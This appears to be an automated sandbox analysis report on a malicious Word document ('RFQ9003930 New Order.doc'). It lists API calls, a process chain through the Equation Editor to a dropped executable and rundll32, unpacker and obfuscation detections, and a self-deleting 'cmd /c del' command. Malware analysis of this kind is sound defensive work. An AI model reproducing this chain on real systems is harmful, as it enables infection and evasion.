Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CBE0C6 5_2_00CBE0C6
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CC3040 5_2_00CC3040
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CD905A 5_2_00CD905A
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CED005 5_2_00CED005
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CBE2E9 5_2_00CBE2E9
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00D61238 5_2_00D61238
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CBF3CF 5_2_00CBF3CF
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CE63DB 5_2_00CE63DB
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CC7353 5_2_00CC7353
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00D0A37B 5_2_00D0A37B
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CC2305 5_2_00CC2305
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CD1489 5_2_00CD1489
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CF5485 5_2_00CF5485
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CDC5F0 5_2_00CDC5F0
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CC351F 5_2_00CC351F
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CCE6C1 5_2_00CCE6C1
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CC4680 5_2_00CC4680
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00D62622 5_2_00D62622
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CF57C3 5_2_00CF57C3
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00D4579A 5_2_00D4579A
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CCC7BC 5_2_00CCC7BC
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00D5F8EE 5_2_00D5F8EE
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CCC85C 5_2_00CCC85C
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CE286D 5_2_00CE286D
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CD69FE 5_2_00CD69FE
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00D6098E 5_2_00D6098E
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CC29B2 5_2_00CC29B2
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00D45955 5_2_00D45955
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00D73A83 5_2_00D73A83
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00D4DBDA 5_2_00D4DBDA
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CBFBD7 5_2_00CBFBD7
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00D6CBA4 5_2_00D6CBA4
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CE7B00 5_2_00CE7B00
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00D5FDDD 5_2_00D5FDDD
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CCCD5B 5_2_00CCCD5B
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CF0D3B 5_2_00CF0D3B
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CDEE4C 5_2_00CDEE4C
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CF2E2F 5_2_00CF2E2F
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CEDF7C 5_2_00CEDF7C
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CD0F3F 5_2_00CD0F3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_024A1238 7_2_024A1238
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023FE2E9 7_2_023FE2E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02407353 7_2_02407353
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0244A37B 7_2_0244A37B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02402305 7_2_02402305
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_024263DB 7_2_024263DB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023FF3CF 7_2_023FF3CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02403040 7_2_02403040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0241905A 7_2_0241905A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0242D005 7_2_0242D005
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023FE0C6 7_2_023FE0C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_024A2622 7_2_024A2622
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0240E6C1 7_2_0240E6C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02404680 7_2_02404680
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_024357C3 7_2_024357C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0248579A 7_2_0248579A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0240C7BC 7_2_0240C7BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02435485 7_2_02435485
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02411489 7_2_02411489
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0240351F 7_2_0240351F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0241C5F0 7_2_0241C5F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_024B3A83 7_2_024B3A83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02427B00 7_2_02427B00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0248DBDA 7_2_0248DBDA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023FFBD7 7_2_023FFBD7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_024ACBA4 7_2_024ACBA4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0240C85C 7_2_0240C85C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0242286D 7_2_0242286D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0249F8EE 7_2_0249F8EE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02485955 7_2_02485955
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_024169FE 7_2_024169FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_024A098E 7_2_024A098E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_024029B2 7_2_024029B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0241EE4C 7_2_0241EE4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02432E2F 7_2_02432E2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0242DF7C 7_2_0242DF7C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02410F3F 7_2_02410F3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0240CD5B 7_2_0240CD5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02430D3B 7_2_02430D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0249FDDD 7_2_0249FDDD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_000BD630 7_2_000BD630
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_000BED7F 7_2_000BED7F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_000A2D87 7_2_000A2D87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_000A2D90 7_2_000A2D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_000A9E50 7_2_000A9E50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_000A2FB0 7_2_000A2FB0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 023FDF5C appears 107 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 02443F92 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 0244373B appears 238 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 0246F970 appears 81 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 023FE2A8 appears 38 times
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: String function: 00D03F92 appears 108 times
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: String function: 00D0373B appears 238 times
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: String function: 00CBE2A8 appears 38 times
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: String function: 00D2F970 appears 81 times
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: String function: 00CBDF5C appears 105 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_0041A350 NtCreateFile, 5_2_0041A350
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_0041A400 NtReadFile, 5_2_0041A400
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_0041A480 NtClose, 5_2_0041A480
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_0041A530 NtAllocateVirtualMemory, 5_2_0041A530
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_0041A30A NtCreateFile, 5_2_0041A30A
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_0041A3FD NtReadFile, 5_2_0041A3FD
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_0041A47A NtClose, 5_2_0041A47A
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_0041A52B NtAllocateVirtualMemory, 5_2_0041A52B
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CB00C4 NtCreateFile,LdrInitializeThunk, 5_2_00CB00C4
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CB0048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_00CB0048
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CB0078 NtResumeThread,LdrInitializeThunk, 5_2_00CB0078
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CAF9F0 NtClose,LdrInitializeThunk, 5_2_00CAF9F0
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CAF900 NtReadFile,LdrInitializeThunk, 5_2_00CAF900
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CAFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_00CAFAD0
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CAFAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_00CAFAE8
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CAFBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_00CAFBB8
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CAFB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_00CAFB68
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CAFC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_00CAFC90
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CAFC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_00CAFC60
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CAFDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_00CAFDC0
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CAFD8C NtDelayExecution,LdrInitializeThunk, 5_2_00CAFD8C
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CAFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_00CAFED0
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CAFEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_00CAFEA0
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CAFFB4 NtCreateSection,LdrInitializeThunk, 5_2_00CAFFB4
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CB10D0 NtOpenProcessToken, 5_2_00CB10D0
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CB0060 NtQuerySection, 5_2_00CB0060
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CB01D4 NtSetValueKey, 5_2_00CB01D4
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CB1148 NtOpenThread, 5_2_00CB1148
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CB010C NtOpenDirectoryObject, 5_2_00CB010C
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CB07AC NtCreateMutant, 5_2_00CB07AC
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CAF8CC NtWaitForSingleObject, 5_2_00CAF8CC
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CAF938 NtWriteFile, 5_2_00CAF938
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CB1930 NtSetContextThread, 5_2_00CB1930
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CAFAB8 NtQueryValueKey, 5_2_00CAFAB8
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CAFA50 NtEnumerateValueKey, 5_2_00CAFA50
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CAFA20 NtQueryInformationFile, 5_2_00CAFA20
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CAFBE8 NtQueryVirtualMemory, 5_2_00CAFBE8
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CAFB50 NtCreateKey, 5_2_00CAFB50
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CAFC48 NtSetInformationFile, 5_2_00CAFC48
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CB0C40 NtGetContextThread, 5_2_00CB0C40
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CAFC30 NtOpenProcess, 5_2_00CAFC30
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CB1D80 NtSuspendThread, 5_2_00CB1D80
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CAFD5C NtEnumerateKey, 5_2_00CAFD5C
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CAFE24 NtWriteVirtualMemory, 5_2_00CAFE24
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CAFFFC NtCreateProcessEx, 5_2_00CAFFFC
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CAFF34 NtQueueApcThread, 5_2_00CAFF34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023F00C4 NtCreateFile,LdrInitializeThunk, 7_2_023F00C4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023F07AC NtCreateMutant,LdrInitializeThunk, 7_2_023F07AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023EFAB8 NtQueryValueKey,LdrInitializeThunk, 7_2_023EFAB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023EFAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_023EFAE8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_023EFAD0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023EFB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_023EFB68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023EFB50 NtCreateKey,LdrInitializeThunk, 7_2_023EFB50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023EFBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_023EFBB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023EF900 NtReadFile,LdrInitializeThunk, 7_2_023EF900
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023EF9F0 NtClose,LdrInitializeThunk, 7_2_023EF9F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_023EFED0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023EFFB4 NtCreateSection,LdrInitializeThunk, 7_2_023EFFB4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023EFC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_023EFC60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023EFD8C NtDelayExecution,LdrInitializeThunk, 7_2_023EFD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023EFDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_023EFDC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023F0078 NtResumeThread, 7_2_023F0078
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023F0060 NtQuerySection, 7_2_023F0060
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023F0048 NtProtectVirtualMemory, 7_2_023F0048
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023F10D0 NtOpenProcessToken, 7_2_023F10D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023F010C NtOpenDirectoryObject, 7_2_023F010C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023F1148 NtOpenThread, 7_2_023F1148
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023F01D4 NtSetValueKey, 7_2_023F01D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023EFA20 NtQueryInformationFile, 7_2_023EFA20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023EFA50 NtEnumerateValueKey, 7_2_023EFA50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023EFBE8 NtQueryVirtualMemory, 7_2_023EFBE8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023EF8CC NtWaitForSingleObject, 7_2_023EF8CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023EF938 NtWriteFile, 7_2_023EF938
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023F1930 NtSetContextThread, 7_2_023F1930
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023EFE24 NtWriteVirtualMemory, 7_2_023EFE24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023EFEA0 NtReadVirtualMemory, 7_2_023EFEA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023EFF34 NtQueueApcThread, 7_2_023EFF34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023EFFFC NtCreateProcessEx, 7_2_023EFFFC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023EFC30 NtOpenProcess, 7_2_023EFC30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023EFC48 NtSetInformationFile, 7_2_023EFC48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023F0C40 NtGetContextThread, 7_2_023F0C40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023EFC90 NtUnmapViewOfSection, 7_2_023EFC90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023EFD5C NtEnumerateKey, 7_2_023EFD5C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023F1D80 NtSuspendThread, 7_2_023F1D80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_000BA350 NtCreateFile, 7_2_000BA350
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_000BA400 NtReadFile, 7_2_000BA400
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_000BA480 NtClose, 7_2_000BA480
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_000BA530 NtAllocateVirtualMemory, 7_2_000BA530
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_000BA30A NtCreateFile, 7_2_000BA30A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_000BA3FD NtReadFile, 7_2_000BA3FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_000BA47A NtClose, 7_2_000BA47A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_000BA52B NtAllocateVirtualMemory, 7_2_000BA52B
PE file contains strange resources
Source: harshmanzx[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: hasmenhtk721.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write
Source: RFQ9003930 New Order.doc Virustotal: Detection: 28%
Source: RFQ9003930 New Order.doc ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe C:\Users\user\AppData\Roaming\hasmenhtk721.exe
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Process created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe C:\Users\user\AppData\Roaming\hasmenhtk721.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\hasmenhtk721.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe C:\Users\user\AppData\Roaming\hasmenhtk721.exe
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Process created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe C:\Users\user\AppData\Roaming\hasmenhtk721.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\hasmenhtk721.exe'
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$Q9003930 New Order.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRF594.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@9/8@4/3
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: explorer.exe, 00000006.00000000.522105380.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: hasmenhtk721.exe, rundll32.exe
Source: Binary string: rundll32.pdb source: hasmenhtk721.exe, 00000005.00000002.477204185.0000000000504000.00000004.00000020.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: harshmanzx[1].exe.2.dr, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: hasmenhtk721.exe.2.dr, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.hasmenhtk721.exe.bb0000.0.unpack, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.hasmenhtk721.exe.bb0000.2.unpack, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.hasmenhtk721.exe.bb0000.0.unpack, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.hasmenhtk721.exe.bb0000.3.unpack, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_0041716F push ebx; ret 5_2_0041718F
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_0040E288 push ebp; ret 5_2_0040E289
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_0041D4F2 push eax; ret 5_2_0041D4F8
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_0041D4FB push eax; ret 5_2_0041D562
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_0041D4A5 push eax; ret 5_2_0041D4F8
